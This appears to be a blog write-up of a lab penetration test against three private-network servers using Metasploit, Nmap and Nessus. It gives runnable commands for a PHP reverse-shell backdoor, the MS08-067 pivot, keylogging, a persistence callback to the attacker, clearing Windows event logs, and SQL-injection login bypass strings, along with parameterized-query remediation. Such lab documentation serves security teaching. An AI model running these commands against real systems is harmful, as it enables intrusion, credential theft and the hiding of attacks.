.jpg)
This test involves a vulnerable Ubuntu Linux server sitting in a DMZ acting as our entry point, one Windows server acting as a vulnerable server segmented from direct internet access and a “secure” Debian 6 Linux server with a vulnerable web site running. By using the penetration testing methodology, we will see a step by step penetration test.
An attack machine running Kali Linux and employing Metasploit framework, Nessus and Google are used to perform the tests.
Research time: ~8 hours (How to setup servers, installing vulnerabilities, how to recon, exploit, maintain access)
Setup time for servers: ~13 hourRecon Time & Assessment: ~2 hours
Actual action: ~10 hours involving exploiting servers, keeping access, pivoting, assessing various tools, exploits, backdoors, information gathering tools (such as key loggers).
Miscellaneous report writing & actual class assignment: ~2 hours
Step by Step Penetration Test Methodology
Recon/Scanning:
To perform an intelligent test of a network, information and intelligence gathering is the first logical step any tester (or hacker) should perform. NMap and Nessus are two of the most common tools used to scan a host/network in order to probe for services, open ports and general information such as operating system. These tools are often used for an external test. Internal tests require a bit more finesse and stealth.
Before running Metasploit, run these:
Service postgresql start && service Metasploit start
From the msfconsole run:
Nmap –O–sV –sC –oX /root/capstone/nmap-scan.xml –stylesheet=nmap.xsl 192.168.142.130-145
This will probe open ports to determine service/version information. To import this file back into Metasploit:
db_import /root/capstone/nmap-scan.xml
We can see the IP of the host with which port, protocol, and service is being used. On top of that, since we had version detection on, it displays more information about which version of the service is running. A “d” at the end of a service such as ircd stands for “daemon” which means the port is listening for a service in the background. To search for modules for a particular service, use the search command. For example, “search postfix” would search for apache exploits.
Management
Armitage: At the command line, type Armitage to start the Armitage target visualization and management tool. (If not installed, do: apt-get install Armitage) Armitage will use the imported data from NMap to populate the graphical interface with hosts.
Exploitation
With the NMap scan completed, and in msfconsole, view hosts with the “hosts” command (Target Server is the name of the target).
Pick vulnerability and use the search <software name> to find modules for that vulnerability.
Target a vulnerable server to exploit in order to gain access. Using this server, we will pivot to a more secure server on the inside of a network. I have targeted a webserver that allows for command injection, which allows me to download data. I have opted to use the reverse_tcp payload in order to get a meterpreter shell (not just a command shell) on the target machine.
From msfconsole:
msfvenom –p php/meterpreter/reverse_tcp LHOST=<my ip address of attacking machine> -f raw > /tmp/bk.php
(Be sure to edit the bk.php, or whatever you name it and remove the 1st #)
From /tmp start a simple webserver using python –m SimpleHTTPServer
We then have to transfer bk.php to the vulnerable webserver, now we can use the reverse tcp meterpreter shell contained within bk.php to connect our attack machine to and gain a meterpreter shell:
Msf > use exploit/multi/handlerExploit(handler) > set PAYLOAD php/meterpreter/reverse_tcpSet LHOST <localip>Exploit
Pivoting
We have obtained a meterpreter shell on the web server. We will need to background meterpreter so we can setup our pivot. To do this, we can use Metasploit route command to associate the new route to our meterpreter session. We have Intel on an internal Windows 2000 server on the internal side. I have chosen to use the reliable RPC exploit ms08_067_netapi
Use exploit /windows/smb/ms08_067_netapiSet RHOST 192.168.142.134set PAYLOAD windows/meterpreter/bind_tcpshow targetsset target 1exploit
Maintaining connection state
Exploited processes can be reset due to bad connections, anti-virus software and a host of other system activities. In order to fix this problem, we can migrate our meterpreter session to a system process.
Meterpreter > ps (to list processes)Meterpreter > migrate <pidnumber>Meterpreter > keyscan startMeterpreter < keyscan_dump
We could also migrate to the winlogon service to capture credentials of users logging into a windows system and running the same keyscan commands.
Maintaining future access
Maintaining access to a compromised system is essential as one never knows when a patch will be applied. This way, the time involved in compromising the system will not be wasted, and you can still gain access to the system. Metasploit has a Meterpreter script, persistence.rb, which will create a Meterpreter service that will be available to you even if the remote system is rebooted.
We will configure our persistent Meterpreter session to wait until a user logs on to the remote system and try to connect back to our listener every 5 seconds at IP address <attacker IP> on port 443. On a compromised system:
Meterpreter> run persistence -U -i 5 -p 443 -r <attackerIp>Meterpreter > exitMsf exploit (ms08_067_netapi) > use exploit/multi/handlermsf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcpmsf exploit(handler) > set LHOST 192.168.1.71msf exploit(handler) > set LPORT 443msf exploit(handler) > exploit
When a user logs in to the remote system, a Meterpreter session is opened up for us.
Covering tracks
Clearing windows event logs is a good practice if you do not want your activities logged or the methods by which an exploit was used to be logged. From the meterpreter prompt, we can use the Interactive Ruby shell to clear logs as we progress.
Meterpreter > irb
>> log = client.sys.eventlog.open(‘system’)
>> log.clear
Step by Step Website Penetration SQL injection
Vulnerability scanners often miss SQL injection vulnerabilities in websites. If we browse to the server that seems secure, and we know has a web page, we can do some security reconnaissance to make sure everything is secure. This website has an Admin Login link; this can provide us with the type of database being used. At the login screen, input a single quote into the username field and enter. We can determine that the server is using MySQL on the backend.
At the admin login screen, at the username prompt enter:
A single quote space OR space 1=1 space – space
(space refers to an actual space) : ‘ OR 1=1 –
This should comment the AND password part of the query. The use of OR 1=1 is to force a true statement in the case of a login script being exploited. This sets the username as blank or 1=1 which is TRUE. The – (which is a MySQL comment symbol) comments out the AND password section of the MySQL query.
If we wanted to login as a user with admin privileges, enter a random username and in the password field enter:
‘ or (1=1 and username ‘someguy’) –
To fix this issue, patching will not be sufficient. The developer should use Prepared Statements (Parameterized Queries)
Parameterized queries force the developer to first define all the SQL code, and then pass in each parameter to the query later. This coding style allows the database to distinguish between code and data, regardless of what user input is supplied.
Prepared statements ensure that an attacker is not able to change the intent of a query, even if SQL commands are inserted by an attacker.
Step by Step Penetration Test Report Summary
Using Nessus to perform an internal & Web Application scan, 173 Total vulnerabilities were identified over 3 servers:
External Web Server
OS: Ubuntu 10.04IP: 192.168.142.130
7 Critical risk Vulnerabilities detected5 High risk Vulnerabilities detected14 Medium risk Vulnerabilities detected3 Low risk Vulnerabilities detected
Internal File Server
OS: Windows 2000 ServerIP: 192.168.142.134
22 Critical Vulnerabilities detected5 High risk Vulnerabilities detected13 Medium risk Vulnerabilities detected6 Low risk Vulnerabilities detected
Internal Web/Email Server
OS: Debian 6.0IP: 192.168.142.140
1 Medium risk Vulnerability detected
Step by Step Penetration Test Report
Stage 1:
External web server maintained command injection. This weakness allowed Red Team to deposit a backdoor on said Web Server. Using this backdoor, Red Team was able to establish a meterpreter session with the target host. Once this vulnerability is patched, UnrealIRC daemon can be exploited, however a standard shell is enabled and not a meterpreter session. This vulnerability is also not listed in the Nessus report, as such, this is the reason we targeted this specific attack at this server.
Stage 2:
Having established a meterpreter session, we used the ms08_067_netapi vulnerability on the unpatched Internal File Server to pivot to aforementioned File Server. We have now used the vulnerable external server to bypass network protections. Red Team then installed persistence script to enable access without the need for a pivot server, and patched the server to prevent other hackers from accessing the server. Red Team then migrates the meterpreter process to explorer.exe and runs keyscan to capture all keyboard entry as well as login information for users that login after keyscan is running if we migrate to the winlogon.exe service.
If we are unable to grab passwords via key logging, we fall back to password hash passing using the psexec module of Metasploit.
Credits: 4ntipatika
0 comments:
Post a Comment